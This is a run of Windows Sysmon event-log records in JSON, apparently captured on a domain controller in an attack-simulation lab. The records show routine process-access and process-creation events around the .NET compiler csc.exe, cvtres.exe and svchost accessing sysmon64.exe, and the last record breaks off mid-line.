{"EventTime":"2020-08-01 06:54:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4802,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:56.724\r\nSourceProcessGUID: {E2A3D6B1-11BF-5F25-0000-0010A36F0600}\r\nSourceProcessId: 1492\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11C0-5F25-0000-0010B2910600}\r\nTargetProcessId: 2312\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:56.724","SourceProcessGUID":"{E2A3D6B1-11BF-5F25-0000-0010A36F0600}","SourceProcessId":"1492","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11C0-5F25-0000-0010B2910600}","TargetProcessId":"2312","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4803,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.055\r\nProcessGuid: {E2A3D6B1-11C1-5F25-0000-00105A950600}\r\nProcessId: 2520\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nFileVersion: 12.00.52519.0 built by: VSWINSERVICING\r\nDescription: Microsoft® Resource File To COFF Object Conversion Utility\r\nProduct: Microsoft® .NET Framework\r\nCompany: Microsoft Corporation\r\nOriginalFileName: CVTRES.EXE\r\nCommandLine: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES9727.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSCD3DB6BAD8694ADA9EEC19853E6D9F.TMP\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11BF-5F25-0000-0020E96E0600}\r\nLogonId: 0x66EE9\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF\r\nParentProcessGuid: {E2A3D6B1-11C0-5F25-0000-0010B2910600}\r\nParentProcessId: 2312\r\nParentImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nParentCommandLine: \"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\u1pdf52i.cmdline\"","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.055","ProcessGuid":"{E2A3D6B1-11C1-5F25-0000-00105A950600}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","FileVersion":"12.00.52519.0 built by: VSWINSERVICING","Description":"Microsoft® Resource File To COFF Object Conversion Utility","Product":"Microsoft® .NET Framework","Company":"Microsoft Corporation","OriginalFileName":"CVTRES.EXE","CommandLine":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \"/OUT:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\RES9727.tmp\" \"c:\\Users\\Administrator\\AppData\\Local\\Temp\\CSCD3DB6BAD8694ADA9EEC19853E6D9F.TMP\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11BF-5F25-0000-0020E96E0600}","LogonId":"0x66ee9","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=33BB8BE0B4F547324D93D5D2725CAC3D,SHA256=54315FD2B69C678EB7D8C145F683C15F41FA9F7B9ABF7BF978667DF4158F43C3,IMPHASH=9A65E39CA38ADDAA7D4BB704AD0223FF","ParentProcessGuid":"{E2A3D6B1-11C0-5F25-0000-0010B2910600}","ParentProcessId":"2312","ParentImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","ParentCommandLine":"\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\u1pdf52i.cmdline\"","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4804,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.052\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.052","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4805,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.052\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.052","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4806,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.052\r\nSourceProcessGUID: {E2A3D6B1-11C0-5F25-0000-0010B2910600}\r\nSourceProcessId: 2312\r\nSourceThreadId: 1408\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nTargetProcessGUID: {E2A3D6B1-1188-5F25-0000-0010903C0600}\r\nTargetProcessId: 2520\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.052","SourceProcessGUID":"{E2A3D6B1-11C0-5F25-0000-0010B2910600}","SourceProcessId":"2312","SourceThreadId":"1408","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","TargetProcessGUID":"{E2A3D6B1-1188-5F25-0000-0010903C0600}","TargetProcessId":"2520","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\cvtres.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+b181|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3d58|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3ed0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+3fa6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+274e|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+27a0|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorpehost.dll+28e4|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+7e38f|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+45d22|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+448ef|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+445e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+44303|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+18321|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+17b76|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+9e0d|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe+1edf02|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4807,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.052\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.052","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4808,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.052\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:57.052","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:57","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4809,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:57.052\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 